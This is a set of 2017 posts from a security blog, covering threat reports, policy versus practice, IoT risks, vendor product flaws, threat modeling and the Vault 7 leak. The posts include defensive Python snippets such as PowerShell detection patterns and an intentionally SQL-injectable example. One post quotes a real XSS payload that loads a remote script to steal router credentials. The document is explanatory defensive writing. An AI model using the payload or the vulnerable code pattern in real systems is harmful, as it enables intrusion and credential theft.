IANS Blog

  • Report: Criminals Scale Up Attacks, Ratchet Down Complexity

    by Chris Gonsalves | Apr 26, 2017

    Wednesday, April 26, 2017 By Chris Gonsalves, IANS Director of Technology Research


    The past year proved a bonanza for criminals hell-bent on hacking corporate systems, stealing credentials, pilfering funds and holding data hostage, not to mention influencing the odd presidential election here and there. Along the way, the bad guys have discovered two things: persistence pays and the simplest methods work best.

    The latest annual Internet Security Threat Report (ISTR) from Symantec, out this week, is a breathless litany of cyber malfeasance highlighting an online security environment stressed by big spikes in phishing attacks, ransomware infections, political chicanery and IoT-based botnet activity.

    The ISTR combines data from Symantec’s 98 million Global Intelligence Network sensors along with analysis of billions of events and documents processed by the vendor’s collection of endpoint protection, anti-spam and managed security services. Among the more chilling findings this year:

    • One in every 131 emails contains a malicious link or attachment, the highest rate of infection seen in more than five years.

    • Ransomware attacks are up 36 percent from last year, and the average ransom demand for compromised data has jumped more than 260 percent, from $294 to $1,077.

    • The United States remains the top ransomware target; small wonder since the majority of Americans (64 percent) pay their attackers to get their data back.

    • The typical company now has nearly 1,000 cloud apps enabled, which comes as a big surprise to CIOs who say they believe the number to be around 40.

    • Zero-days, sophisticated malware and web attack toolkits are falling out of favor with crooks looking for cheaper, easier methods and leveraging spear phishing and freely available scripting tools like Microsoft PowerShell and Office macros.

    • Hacks for subversive purposes, in particular those during the U.S. election and other global acts of targeted cyber sabotage, are an emerging form of high-profile targeted attack.

    "New sophistication and innovation are the nature of the threat landscape, but this year Symantec has identified seismic shifts in motivation and focus," said Symantec Security Response Director Kevin Haley. "The world saw specific nation states double down on political manipulation and straight sabotage. Meanwhile, cyber criminals caused unprecedented levels of disruption by focusing their exploits on relatively simple IT tools and cloud services."

    According to Symantec researchers, email is clearly the weapon of choice for today’s attackers. Not only is the percentage of emails with malicious attachments growing, but even simpler attacks such as Business Email Compromise (BEC) scams are expanding as well. Scammers stole more than $3 billion from BEC victims last year and BEC scams now target more than 400 businesses daily.


    Modern attackers are also traveling light and keeping things simple with a “live off the land” approach that eschews complicated malware and exploit kits in favor of using tools on hand, such as legitimate network administration software and operating system features. Last year, Symantec researchers noted a marked increase in the use of Microsoft PowerShell and MS Office macros as weapons. Some 95 percent of PowerShell files seen by Symantec in the wild in 2016 were malicious, according to the ISTR.
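    To make the “living off the land” trend concrete, here is a minimal, hypothetical detection sketch in Python. It is not Symantec's method; the patterns and the sample command line are illustrative assumptions, showing the kind of heuristic a defender might run over collected process command lines to flag encoded or download-cradle PowerShell invocations.

        import base64
        import re

        # Illustrative heuristics only: substrings commonly seen in malicious
        # "living off the land" PowerShell use. Real detection needs proper
        # endpoint telemetry and tuning to avoid false positives.
        SUSPICIOUS_PATTERNS = [
            r"-enc(odedcommand)?\s",      # base64-encoded command block
            r"downloadstring\(",          # in-memory download cradle
            r"-nop\b",                    # -NoProfile
            r"-w(indowstyle)?\s+hidden",  # hide the console window
        ]

        def flag_powershell_command(cmdline):
            """Return the suspicious patterns found in a process command line."""
            lowered = cmdline.lower()
            return [p for p in SUSPICIOUS_PATTERNS if re.search(p, lowered)]

        def decode_encoded_block(cmdline):
            """Best-effort decode of an '-EncodedCommand <base64>' argument for review."""
            match = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
            if not match:
                return None
            try:
                return base64.b64decode(match.group(1)).decode("utf-16-le", errors="replace")
            except (ValueError, UnicodeDecodeError):
                return None

        if __name__ == "__main__":
            sample = "powershell.exe -NoP -W Hidden -Enc SQBFAFgA"  # fabricated example
            print(flag_powershell_command(sample))   # three patterns match
            print(decode_encoded_block(sample))      # decodes to "IEX"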

    Taking advantage of compromised systems increasingly means ransomware, the vendor research found. Not only are ransomware incidents up by more than one-third year over year, but the variety of infections is blossoming as well. Symantec identified over 100 new ransomware families released into the wild in 2016, more than triple the number seen previously.

    Not all online criminals are satisfied with the growing take from ransomware, however. Though the Symantec report shows a nearly threefold increase in ransom demands for purloined data, a growing number of cyber crooks, particularly those with deep, nation-state pockets, are going after bigger fish.

    Hackers from suspect regimes like North Korea set records last year with highly organized, multi-million-dollar heists from banks in Bangladesh, Vietnam, Ecuador and Poland.

    "This was an incredibly audacious hack as well as the first time we observed strong indications of nation-state involvement in financial cybercrime," said Haley of the Bangladesh heist.



  • Beaver: Policies Don't Get Hacked, So Why Do They Get All the Attention?

    by Daniel Maloof | Apr 20, 2017

    Thursday, April 20, 2017 By Kevin Beaver, IANS Faculty



    What's the first thing everyone seems to talk about when information security is brought up? What about when a new business is starting up, or even when existing organizations are undergoing an audit? The first thing that comes up every time is security policies. Got a risk? There’s a policy for that. Concerned about experiencing a breach? No worries, there’s a policy that covers it.

    There's a policy for acceptable usage and one for data classification. Data backups, patching and system maintenance are often documented in policies as well. Mobile, the cloud, you name it – security policies are everywhere. And they’re creating a serious false sense of security from the smallest startups to the largest enterprises.

    IT people often write these security policies. In fact, IT is where policies often begin and end. Users don’t know about them and management is quick to proclaim that policies are in place to keep things in check. It all looks good on paper. That is, until the first breach occurs.

    If you lived on another planet, were teleported to earth and read about all of the data breaches and security incidents happening around the globe, you would probably wonder what's causing all of this. After all, organizations have security policies that lay out, often in great detail, how things work and how things go down in and around IT. You would expect, given the level of effort that goes into security policy development and oversight, that an organization could not possibly get breached with all of these rules in place.

    Here's the problem: those rules really mean nothing in the grand scheme of things. Sure, auditors love them. Management wants to see them so they can tell their colleagues about them. Policies just make everyone on the perimeter of IT – and outside it – feel all warm and fuzzy.

    Turning Words into Action

    At the end of the day, though, words on paper that talk about how things are supposed to work have no real substance and do very little in terms of risk mitigation. There's a big gap between what you say you're doing in security and what's actually being done. And everybody knows where the weaknesses are. There’s just too much bureaucracy, culture and political nonsense getting in the way.

    It’s not the policies that get hacked. Systems do. Applications do. People do. I can’t tell you how many times I have seen businesses with excellent documentation on the administrative/operations side and horrible security vulnerabilities on the technical side. We have to stop spending so much valuable time, money and effort on writing security policies that end up on a network share, likely never to be seen again.

    Putting on my expert witness hat, I’ve seen time and again where security policies create more problems than they solve. Many organizations are saying they do X, Y and Z, but they're often doing quite the opposite. And guess what? Lawyers and their litigation support team are calling these organizations out on it. Is this the way you want to run your security program? I know it's not, but still, you've got to figure out what you're going to do to bridge the gap between your wayward documentation and reality.

    It can get disheartening if you let it, but I like to focus on all of the opportunities that are out there for us. There’s always an upside, especially when you focus on what matters.

    As security professionals, we need to stop relying on words and let our actions do the talking. Technical controls have to be in place in order for policies to be enforced in most situations. Where that’s not possible or feasible, do something else – whatever it takes. There’s always more. Doing nothing is the easy way out and it’s the fast path to bigger security challenges. We, as information security leaders in our organizations, have to decide how it's going to be.

    Are we going to let lackadaisical, documentation-centric expectations from auditors, regulators and executives drive our security program, or are we going to spend more time on what’s fruitful and build true substance into our programs? We're going to have to address this at some point, so why not start now before someone – one of our own users, a contractor or external attacker – makes us look bad?

     

    ***

    Kevin Beaver, CISSP is an independent information security consultant, writer, professional speaker, and expert witness with Atlanta, Georgia-based Principle Logic, LLC. Kevin has written/co-written 12 books on information security including the best-selling Hacking For Dummies (currently in its 5th edition).

  • Podcast: George Gerchow on CASBs, Cloud Services Providers and the Reality of Security as Code

    by Chris Gonsalves | Apr 14, 2017

    Friday, April 14, 2017 |  By Chris Gonsalves, IANS Director of Technology Research


    The IANS Podcast hits the road this week, meeting up with cloud expert and presentation powerhouse George Gerchow at our Washington DC Forum for a wide-ranging discussion of all things enterprise cloud security. George shares insights into the white-hot Cloud Access Security Broker (CASB) market, and dishes on behind-the-curtain action at the Big 3 cloud providers.

    George dives into SecDevOps, and talks about the need for coding savvy for infosec leaders in the new "security-as-code" world. He also shares how his other life pursuit as an accomplished musician informs his work as an information security thought leader.



    Make sure to subscribe to the IANS Podcast on iTunes or on Google Play.


  • Van Wyk: Get a Handle on Your Data

    by Daniel Maloof | Apr 13, 2017

    Thursday, April 13, 2017 By Ken Van Wyk, IANS Faculty



    “Imagine dropping a squirrel into the middle of a golden retriever conference.”

    That's a pretty simple sentence, right? In a word processor, it’s just English text data. But when you mix in human imagination, it becomes something far more dynamic (either that, or you need an imagination upgrade).

    So, why was anyone surprised when it was announced that a TP-LINK router contained a vulnerability that could be exploited by sending it an SMS text containing “<script src=//n.ms/a.js></script>”?

    Remember, one person’s data is another person’s active content.

    Sure, that JavaScript shouldn’t have given the attacker a copy of the router’s admin username and password, but it does (reportedly, anyway – I haven’t verified it, but for the purpose of this discussion, let's assume it to be accurate). After all, SMS should simply consist of a phone number and 160 characters of static alphanumeric text data.

    Just data, right?

    I always tell the software developers I work with that it is absolutely vital they know their data, inside and out. Bear in mind, too, that data is transient. It can be static text in one context and something altogether different in another – much like the squirrel example above. The important thing is that the software team knows the data in its software, as well as how it is transported and consumed in every context.

    The rule of thumb is that data should be validated on the input side to ensure it conforms to what the recipient is expecting, and it should be filtered on the output side to ensure it cannot cause any harm where it is being consumed.

    In other words, that “<script src=//n.ms/a.js></script>” should have been filtered out by whatever component was sending untrusted data (it came from the user, after all) into an HTML interpreting environment. At a bare minimum, the “<” should become “&lt;”, and so on. In practice, it’s more complicated, because you also have to anticipate malicious input data that is encoded using one of a variety of encoding schemes. Nonetheless, the untrusted data should have been prevented from causing harm downstream where it was consumed.
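    To illustrate the rule of thumb above, here is a minimal Python sketch of both halves. It is not the router's actual code, and the function names and the character allow-list are assumptions of mine: a strict validation check on the input side, and HTML entity encoding on the output side before the data reaches anything that interprets HTML.

        import html
        import re

        # Input side: allow-list validation. A gateway expecting plain SMS text
        # could reject anything outside a conservative character set and length.
        ALLOWED = re.compile(r"^[A-Za-z0-9 .,!?'\-]{1,160}$")

        def validate_sms(text):
            """Accept only messages that conform to what the recipient expects."""
            return bool(ALLOWED.match(text))

        def render_for_html(text):
            """Output side: encode untrusted data before an HTML interpreter sees it.
            '<' becomes '&lt;', '>' becomes '&gt;', and quotes are encoded too."""
            return html.escape(text, quote=True)

        if __name__ == "__main__":
            payload = "<script src=//n.ms/a.js></script>"
            print(validate_sms(payload))     # False: rejected on input
            print(render_for_html(payload))  # &lt;script src=//n.ms/a.js&gt;&lt;/script&gt;

    As the paragraph notes, real code also has to normalize the various encodings an attacker might use before validating, but the split of duties stays the same.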

    But, it wasn’t.

    At the downstream end, the HTML interpreting engine would have no way of knowing if the data was intentional or not, so of course it was going to run the script. Mind you, the mere presence of a script like “a.js” that returns the administrative username and password should also be viewed as a lapse in judgment on someone’s part. Build it and they will come — or, in this case, build it and someone will run it.

    Getting to the Root of the Problem

    So ultimately, there’s culpability to go around in this case. But the main point I want to make is that you need to know your data. Know what should be there and block all else. Prevent untrusted data from causing harm downstream. “Defang” the data before handing it to someone else. Failing to do these things will lead to bad results every time.

    This shouldn’t even be a new lesson to us. Remember buffer overflows? It’s actually a very similar problem. Shove a bunch of machine code into a data stack, including enough data to overwrite the instruction pointer (data) so that it will end up pointing to the memory address of the machine code. And voilà: Your machine code data becomes executing machine code – machine code that was passed to the victim by way of a “data” channel (yes, there are many protections against these things in modern CPU architectures, but that’s beside the point).

    Clearly, this whole intermingling of data and executable content – or “active content” as it’s often called in web application environments – isn’t a problem we’ve solved yet. We’ve applied a bit of duct tape and bubble gum here and there, but the problem persists.

    I recently overheard a colleague discussing highly secure web browser environments, who said “you absolutely have to block active content.” Of course, this doesn't make much sense because what's active in one context is passive in another. So whenever I hear those words, I just chuckle to myself and think, "Go jump in a lake." 

     

    ***

    Ken Van Wyk is president and principal consultant at KRvW Associates and an internationally recognized information security expert, author and speaker. He’s been an infosec practitioner in commercial, academic, and military organizations and was one of the founders of the Computer Emergency Response Team (CERT) at Carnegie Mellon University.

  • Poulin: How Consumer-Grade IoT Could Threaten Your Enterprise

    by Daniel Maloof | Mar 31, 2017

    Friday, March 31, 2017 By Chris Poulin, IANS Faculty


    It’s been a rough few weeks for consumer IoT devices. First, WikiLeaks alleges the CIA created a tool that can make it look like your smart television is off, but in reality it is still powered on, listening to your conversations and possibly even recording video of you surreptitiously. Then, a researcher finds a directory traversal vulnerability in a dishwasher that can be exploited to expose the password file on the connected device.

    Up to this point, the prevailing wisdom has typically been, “who cares about vulnerabilities in home devices? They don't affect the enterprise.” Lately, however, that’s proving to be a critical miscalculation.

    The Mirai botnet demonstrated to us all that home devices can be used to DDoS enterprises – and not just run-of-the-mill companies, but large infrastructure providers – with the ultimate goal of taking down big sites like Amazon, Twitter, Box, PayPal, Netflix, Slack and Airbnb. In addition, some devices double as home consumer appliances and industrial implements. The vulnerable dishwasher, for instance, is a “washer-disinfector” used in hospital and medical facilities, as well as homes. You could – very persuasively – argue that a device that exposes a basic directory traversal wasn’t built with industrial-grade security design and testing.

    Looking ahead, voice-activated assistants such as the Amazon Echo and Google Home are on the horizon at the enterprise level. At least one IANS client I’ve spoken to is considering deploying these devices in an enterprise setting not only to service customer requests, but also to act as an internal assistant: “Alexa, send last month’s P&L report to the finance printer.” The appeal is undeniable, if not the business case.

    Grasping the Important Questions

    As you might expect, however, there are a host of security-related questions, including:

    • Does the system expose a large attack surface or vulnerable services? At the very least, organizations need to perform vulnerability scans upon installation and after every update. Regular vulnerability scans should target voice assistants and other IoT devices, as well as traditional IT systems.

    • Does the system communicate to the back end securely? Organizations should sniff traffic to ensure data is protected and to profile what normal communications look like. If possible, get in the middle of the communications and see what data is transmitted. Test the mobile app to see if it’s easy to break into the account that manages the device and associated data. (A simple back-end TLS check is sketched after this list.)

    • What does the system record? This is the main privacy concern: is Echo or Home listening in on all conversations and sending all the data back to Amazon and Google? Even if there’s no insidious “Record Everything” mandate, voice assistants may be performing pre-queries on potential questions even before you trigger them with “Alexa” or “Ok Google” so they can respond faster. Also, if you press the “Mute” button, does it physically disconnect the microphone(s) or do you have to trust the software? Someone needs to take a few of these devices apart.

    • You can view “History” in the Echo, but how do you know if that’s the entirety of it or just a filtered list? How long is the data retained, whether it’s just the specific requests or ambient conversation? Can you ask the device to read off the history, and if so, would anyone do that? “Alexa, what are the most recent questions I asked you?”

    • How are updates applied, how often do they occur and can you control them? It’s fine for updates to be applied automatically and invisibly to consumer devices, but when it comes to business systems, administrators need to be able to test them on staged equipment before rolling out updates to operational systems. Also, how can administrators be alerted when an update has been applied so that they can run a scan?

    • Can you collect logs and events from the device, into a SIEM, for example? Does it have the capability to generate syslog messages or is there a RESTful API to query? If you can collect data, what events are available? How granular is the data? What commands can you send it (e.g., shut down, clear history, etc.)?
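    As a starting point for the second question above, here is a small Python sketch that checks whether a device's back-end connection negotiates TLS with a certificate that actually verifies. The host name is a placeholder I made up; substitute whatever endpoint you observe the device contacting, and treat this as a lab exercise rather than a finished assessment tool.

        import socket
        import ssl

        # Hypothetical back-end host for illustration only; substitute the
        # endpoint you see the device contacting (e.g., from DNS logs or a capture).
        BACKEND_HOST = "device-backend.example.com"
        BACKEND_PORT = 443

        def check_backend_tls(host, port=443, timeout=5.0):
            """Connect to the device's back-end service and report certificate details.
            A handshake failure, an expired certificate or a hostname mismatch will
            raise here, which is exactly the kind of finding worth recording."""
            context = ssl.create_default_context()  # verifies chain and hostname
            with socket.create_connection((host, port), timeout=timeout) as sock:
                with context.wrap_socket(sock, server_hostname=host) as tls:
                    cert = tls.getpeercert()
                    return {
                        "tls_version": tls.version(),
                        "cipher": tls.cipher()[0],
                        "subject": cert.get("subject"),
                        "not_after": cert.get("notAfter"),
                    }

        if __name__ == "__main__":
            print(check_backend_tls(BACKEND_HOST, BACKEND_PORT))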

    On top of these questions, while you are able to set up multiple users on an Echo, you’re really only setting up different profiles related to things like music, books and other content. This allows you to share playlists and collaborate on to-do or shopping lists. To switch profiles, you simply ask Alexa to do so; there’s no authentication currently. These devices don’t conform to the tenet of not sharing accounts, an obvious staple of enterprise security policies. They also don’t currently support roles.

    The upshot of all this is that smart home devices are coming to an enterprise near you. Expect connected light bulbs to light up your cubicle – or the operating room where you’re undergoing surgery (yikes). We already have telesurgery robots, so it won’t be long before someone gets the bright idea to connect them to a voice assistant. “Alexa, cut out Chris’ appendix." Will you be ready?

    ***

    Chris Poulin is Director of IoT Security and Threat Intel for Booz-Allen Hamilton's Strategic Initiatives Group, where he is responsible for building countermeasures for threats to the Internet of Things. He has a particular focus on connected vehicles, as well as researching and analyzing security trends in cybercrime, cyber warfare, corporate espionage, hacktivism, and emerging threats.

  • Podcast: Raffy Marty on the Truth About Machine Learning, AI and Advanced Analytics in Infosec

    by Chris Gonsalves | Mar 30, 2017

    Thursday, March 30, 2017 | By Chris Gonsalves, IANS Director of Technology Research


    This week, IANS Faculty Raffy Marty stops by to dish on the buzz -- and the hype -- surrounding machine learning and artificial intelligence in security. The VP of all things analytics at Sophos also talks improvements in visualization, trends in endpoint protection, and the need for better asset inventories and data classification in today's enterprises.

  • Beaver: Taking Responsibility for Vendor Product Security

    by Daniel Maloof | Mar 20, 2017

    Monday, March 20, 2017 By Kevin Beaver, IANS Faculty



    When I perform independent information security assessments, I often assess the security of product vendors' systems and software. Some of these products are related to IT and security, while others fall into the Internet-of-Things (IoT) category. Sometimes it's the vendor looking for an independent review, and other times it’s the end user.

    Regardless, the overall goals are always the same: to determine how resilient the system or software is to security attacks, how it meets commonly expected security practices, and how it processes, stores and otherwise handles sensitive information.

    When I'm seeking out security flaws in these products – be it web browser plug-ins, mobile app environments or network-connected hardware devices – the outcomes are predictable. If the system has an IP address, a URL or a mere software surface that can be interacted with, anything is fair game for attack and exploit. All that is typically required is a web browser, command prompt and network analyzer combined with a malicious mindset and knowledge of what to look for. Network and web vulnerability scanners often uncover even more issues. Some common flaws that I have found in these products include:

    • Severely outdated operating system and application patches

    • Users running with administrator or root privileges and no reasonable means of protecting against malware

    • Documented and undocumented backdoor accounts – for some of which the credentials are a simple Google search away

    • Ancillary services and features enabled by default, such as USB ports, as well as FTP and web interfaces that create unnecessary exposures

    • Cross-site scripting and SQL injection flaws

    • Sloppy storage of sensitive user and system configuration information

    • Unencrypted network communications that expose login credentials and connection details of the endpoint systems involved (a quick check for this is sketched after this list)

    • Software installations that reconfigure system settings and create exposures for both endpoints and administrative systems
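    On the unencrypted-communications point in particular, here is a rough Python sketch of the kind of spot check I mean. The device address is a placeholder, the logic is deliberately simple, and it should only ever be pointed at lab equipment you are authorized to test: it flags devices whose web interface answers over plain HTTP without redirecting to HTTPS, which is exactly how login credentials end up crossing the wire in the clear.

        import http.client

        # Placeholder address for illustration; point this only at an isolated
        # test unit you are authorized to probe.
        DEVICE_HOST = "192.0.2.10"

        def http_interface_exposed(host, timeout=5.0):
            """Return True if the device answers over plain HTTP without
            redirecting the browser to an https:// URL."""
            conn = http.client.HTTPConnection(host, 80, timeout=timeout)
            try:
                conn.request("GET", "/")
                resp = conn.getresponse()
                location = resp.getheader("Location", "")
                # Any response over plain HTTP that is not an https:// redirect
                # means the interface (and any login form) is exposed in the clear.
                return not location.lower().startswith("https://")
            except OSError:
                return False  # port 80 closed or unreachable: nothing exposed here
            finally:
                conn.close()

        if __name__ == "__main__":
            if http_interface_exposed(DEVICE_HOST):
                print(DEVICE_HOST + ": web interface reachable over unencrypted HTTP")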

    Every manufacturer out there has a gadget or application that can easily end up creating security risks in the enterprise. Be careful. Just because a vendor makes and sells these products, it doesn't mean they have security-savvy software developers or even someone validating that security is in check. Ironically, IT- and security-related products tend to be the worst offenders.

    It’s clear to me that many product vendors are not thinking about how their systems can be attacked and what those exposures can lead to. I also think this underscores the criticality of IoT and product-centric security and how they impact both businesses and consumers alike.

    Doing Our Part

    Is more regulation needed? That's an entirely different discussion, but generally speaking, I don't think so because we've seen the comical outcomes of regulations such as HIPAA and the CAN-SPAM Act. If anything, regulating product security merely gives businesses and consumers something to fall back on after those products lead to security incidents.

    In the same way we can't rely on the police to keep us safe all the time or doctors to ensure that we always take the proper steps to live long and healthy lives, we all have a responsibility to keep things safe and secure in the systems and software we use. Maybe that means holding these vendors more accountable when security flaws are found. Maybe it means adding your own compensating controls when using their products on your network. Or, perhaps it means letting the market work things out by looking elsewhere and not supporting vendors that have subpar security.

    It's ultimately up to you. At the end of the day, you can't blame poor security and the subsequent incidents and breaches on someone else. Rather than more finger-pointing, regulation and red tape, let's have the discipline to do what's right and take the proper steps to reasonably lock things down – even if it's someone else's product.

    If you suspect a third-party product is exposing your network or creating other unnecessary risks, don't be afraid to test the system yourself if it's in your own environment. Or, ask for (or hire someone to do) an independent assessment. Ask your vendors the tough questions about what they're doing to test and resolve the issues that are uncovered. Hold their feet to the fire. In the worst-case scenario, if an incident or breach does occur, you'll have a paper trail showing that you were taking reasonable steps and doing your own due diligence to keep things in check.

     

    ***

    Kevin Beaver, CISSP is an independent information security consultant, writer, professional speaker, and expert witness with Atlanta, Georgia-based Principle Logic, LLC. Kevin has written/co-written 12 books on information security including the best-selling Hacking For Dummies (currently in its 5th edition).

  • Van Wyk: Building Your Threat Modeling Process

    by Daniel Maloof | Mar 14, 2017

    Tuesday, March 14, 2017 By Ken Van Wyk, IANS Faculty


    It’s not often that a new “cool” thing comes along in information security and we’re able to say we’re already doing it. But that’s the case with threat modeling – well, at least in part. You are doing threat modeling, right? If your answer is “no,” perhaps you just know it by a different name. Maybe you call it a design/architecture review, or something completely different.

    Well, whatever you call it, let’s take a look at threat modeling and why it’s so important for infosec teams.

    Threat modeling is the process of critically reviewing a system’s design for potential security defects – plain and simple. There are a few industry processes that allow us to follow a rigorous methodology, including Microsoft’s STRIDE and DREAD, as well as Synopsys’ (formerly Cigital’s) Architectural Risk Analysis (ARA).

    Or, as fellow IANS Faculty Adam Shostack describes in his excellent book, “Threat Modeling: Designing for Security,” we can follow a simpler, more intuitive approach and still get good results.

    But, why bother? Aren’t we already doing static code analysis and rigorous security testing? Shouldn’t those processes find any security mistakes we’ve made in our software? Well, partially. It’s a question of perspective.

    Static code analysis can be effective at finding implementation bugs such as failing to adequately filter data input, which can result in various cross-site scripting (XSS) and related data injection attacks. Its shortcoming, though, is that it fails to see business-relevant architectural flaws, such as relying on client code (e.g., JavaScript or Objective-C) to make security decisions. If we do our threat modeling well, we can find those sort of design failures before they cause us real grief later. Design failures, after all, can be among the most difficult and costly problems to fix.
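    A tiny, contrived Python example of the distinction (both functions and the scenario are mine, not from any particular scanner's documentation): the first flaw is the kind of implementation bug static analysis reliably flags; the second is an architectural decision that usually sails straight past it.

        import sqlite3

        def get_user(conn, username):
            # Implementation bug: query built by string concatenation -> SQL
            # injection. Static analyzers flag this pattern reliably.
            return conn.execute(
                "SELECT * FROM users WHERE name = '" + username + "'").fetchall()

        def delete_account(request_json, account_id):
            # Design flaw: the server trusts an authorization decision made on the
            # client. No single line looks "wrong," so scanners rarely object, yet
            # any caller can simply claim {"is_admin": True}.
            if request_json.get("is_admin"):
                return "account " + account_id + " deleted"
            return "forbidden"

        if __name__ == "__main__":
            conn = sqlite3.connect(":memory:")
            conn.execute("CREATE TABLE users (name TEXT)")
            conn.execute("INSERT INTO users VALUES ('alice')")
            print(get_user(conn, "alice"))
            print(delete_account({"is_admin": True}, "42"))  # anyone can say this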

    Threat Modeling in Practice

    So how, exactly, do we do this threat modeling thing and in what ways might we already be doing it?

    Basically, it involves four steps:

    1. Model it
    2. Find threats
    3. Address threats
    4. Validate threats

    Easy peasy, right? Well, let’s dive into each of those steps a bit and see for ourselves.

    Model It

    This is where we describe our system. One of the best things about threat modeling is that it allows us to take either a big- or small-picture view of our systems, but we must be able to clearly describe our design. This can take the form of a component diagram – either physical or logical – or things like data-flow diagrams. Be sure to clearly describe the component interconnections within your application. These inputs make up what we call the “attack surface” of the application (or the portion of the application we’re presently considering).
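    There is no one right notation for this step, but even a few lines of structured description go a long way. Here is a toy Python sketch of the idea; every component, trust zone and flow in it is illustrative, not a prescribed schema. The flows that cross a trust boundary are, roughly, your attack surface.

        from dataclasses import dataclass

        @dataclass
        class Component:
            name: str
            trust_zone: str  # e.g. "internet", "dmz", "internal"

        @dataclass
        class DataFlow:
            source: str
            destination: str
            data: str
            crosses_trust_boundary: bool

        # A toy model of a simple web application.
        components = [
            Component("browser", "internet"),
            Component("web_app", "dmz"),
            Component("database", "internal"),
        ]

        flows = [
            DataFlow("browser", "web_app", "login form (credentials)", True),
            DataFlow("web_app", "database", "SQL queries", True),
            DataFlow("web_app", "web_app", "session cache", False),
        ]

        # The flows crossing trust boundaries are the inputs to examine first.
        for f in flows:
            if f.crosses_trust_boundary:
                print(f.source + " -> " + f.destination + ": " + f.data)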

    Find Threats

    So, taken by itself, this piece seems a bit like “… and then a miracle occurs,” right? But there’s obviously a lot more to this, and there are a few things that can make this step go a bit more smoothly.

    For starters, zoom in on one component at a time. Also, make sure to critically consider who has access to each component, including those who are authorized and unauthorized. Then, consider what would motivate the bad guys to attack. What is their goal? What are their expected technical capabilities? Can they, for example, write serious malware that can withstand reverse engineering for a considerable amount of time? In other words, make your threat scenarios real.

    It’s also important to include key personnel such as your incident response operations team, your threat intelligence people, your principal design team and the business owners of the application being reviewed. Encourage the team to brainstorm and record everything they come up with.

    This is also where Microsoft’s STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial-of-Service, Elevation of Privilege) model can be helpful. Use it as a checklist to catalyze conversations about individual scenarios.

    Address Threats

    This is where you decide what, if anything, you’re going to do about each threat you’ve uncovered. Start by prioritizing them. Microsoft’s DREAD (Damage, Reproducibility, Exploitability, Affected Users, Discoverability) methodology can be helpful here. Use it to prioritize your threat list. Some companies prefer a quantified approach here, but I’ve found that the threat model team can do this step pretty intuitively using simple levels of quantification like low, medium and high priority. Of course, don’t neglect to factor in the costs of each potential remediation.
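    As a concrete illustration of that intuitive approach, here is a short Python sketch that turns low/medium/high ratings into a sortable DREAD score. The two threats and their ratings are invented examples, not output from any real review.

        # Coarse low/medium/high DREAD scoring; threats and ratings are invented.
        SCORE = {"low": 1, "medium": 2, "high": 3}
        DREAD = ("damage", "reproducibility", "exploitability",
                 "affected_users", "discoverability")

        threats = [
            {"threat": "Stolen session token replayed (Spoofing)",
             "damage": "high", "reproducibility": "medium", "exploitability": "medium",
             "affected_users": "high", "discoverability": "medium"},
            {"threat": "Verbose error pages leak stack traces (Information Disclosure)",
             "damage": "low", "reproducibility": "high", "exploitability": "high",
             "affected_users": "low", "discoverability": "high"},
        ]

        def dread_score(threat):
            return sum(SCORE[threat[k]] for k in DREAD)

        # Highest combined score first; remediation cost still gets weighed by hand.
        for t in sorted(threats, key=dread_score, reverse=True):
            print(str(dread_score(t)).rjust(2), t["threat"])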

    Validate Threats

    Finally, it’s a good idea to prove that the threats and their remediations are based on facts and not just “gut feel.” Make sure each threat scenario is something your attackers can actually achieve, and that each remediation will truly protect your business.

    Knowing Where to Begin

    So, perhaps you never called this threat modeling, but I’ll bet you were already reviewing your business applications at some level prior to rolling them out. Maybe your process is too simplistic, though. Perhaps a more rigorous threat modeling process like the one I’ve outlined here can be helpful.

    Either way, I say give it a try. Threat model a small application first and see how the process works for you. You may need to tweak it a few times before you get it right, and that’s all good. In Adam Shostack’s book, he encourages us in Chapter 1 to do a simple threat model first, before even getting into processes like the one I’ve described above. That’s great too!

    Ultimately, in my experience with threat modeling, the two most important ingredients for success are a talented and willing multi-disciplinary team and a huge white board. Sure, the former might be a bit tougher to come by, but don’t even think about underestimating that white board! 

     

    ***

    Ken Van Wyk is president and principal consultant at KRvW Associates and an internationally recognized information security expert, author and speaker. He’s been an infosec practitioner in commercial, academic, and military organizations and was one of the founders of the Computer Emergency Response Team (CERT) at Carnegie Mellon University.



  • Vault 7: WikiLeaks Dumps Massive Trove of Alleged CIA Hacking Tools

    by Chris Gonsalves | Mar 07, 2017

    Tuesday, March 7, 2017 By Chris Gonsalves, IANS Director of Technology Research


    Information security professionals on Tuesday were scrambling to make sense of a sizable dump of alleged CIA surveillance tools and techniques that appears to detail methods for hacking into networks, computers, smartphones and internet-connected consumer devices such as smart TVs.

    Notorious document leakers WikiLeaks released the trove of nearly 8,000 pages and 1,000 attachments, which includes supposed details of the CIA’s hacking arsenal such as malware, viruses, trojans, weaponized zero-day exploits and malware remote control systems. WikiLeaks officials said the Tuesday document dump, dubbed Vault 7, constitutes “the largest ever publication of confidential documents on the agency” and is just the first part of what it promises will be an ongoing release with “several hundred million lines of code” comprising “the entire hacking capacity of the CIA.”

    While security industry insiders work to verify the authenticity -- and relative importance -- of the documents and the code in the release, the claims raising the most concern include details of the CIA’s ability to work around encryption efforts in popular mobile messaging apps by capturing message data in compromised endpoints prior to encryption. The Vault 7 release indicates robust and focused efforts by the CIA to develop and hoard exploits targeting Apple's iPhone, Google's Android and Microsoft’s Windows operating systems.

    Perhaps most damaging, the release, which includes verifiable CIA code names and organization charts, exposes CIA playbooks showing how the agency conducts operations, evades detection and deploys malware.

    According to a statement from WikiLeaks accompanying the Vault 7 dump, the CIA over the past seven years has been developing an elite hacking division to compete with its main cyber-intelligence rival, the NSA. By last year, the CIA hacking unit, which falls under the Center for Cyber Intelligence, had more than 5,000 registered users and “had produced more than a thousand hacking systems, trojans, viruses and other weaponized malware.”

    The collection of CIA hacking tools and techniques, many of which appear fairly routine on first inspection, “appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive,” WikiLeaks officials said. Dates on the released documents range from 2013 to 2016.

    If ultimately proven authentic, the Vault 7 document collection will also be notable for revealing:

    • In addition to its operations in Langley, Va., the CIA also uses the U.S. consulate in Frankfurt, Germany, as a covert base for hackers working in Europe, the Middle East and Africa.

    • The CIA's arsenal includes numerous local and remote zero-days obtained from GCHQ, NSA, FBI or purchased from cyber arms contractors such as Baitshop.

    • CIA hackers have developed successful attacks against most well-known anti-virus programs and have targeted anti-exploitation defenses such as EMET.

    “Honestly, this pretty much kills large aspects of the United States offensive capabilities, techniques, and ability to perform operations,” noted security expert and IANS Faculty Dave Kennedy said on Twitter in the wake of the Vault 7 release.

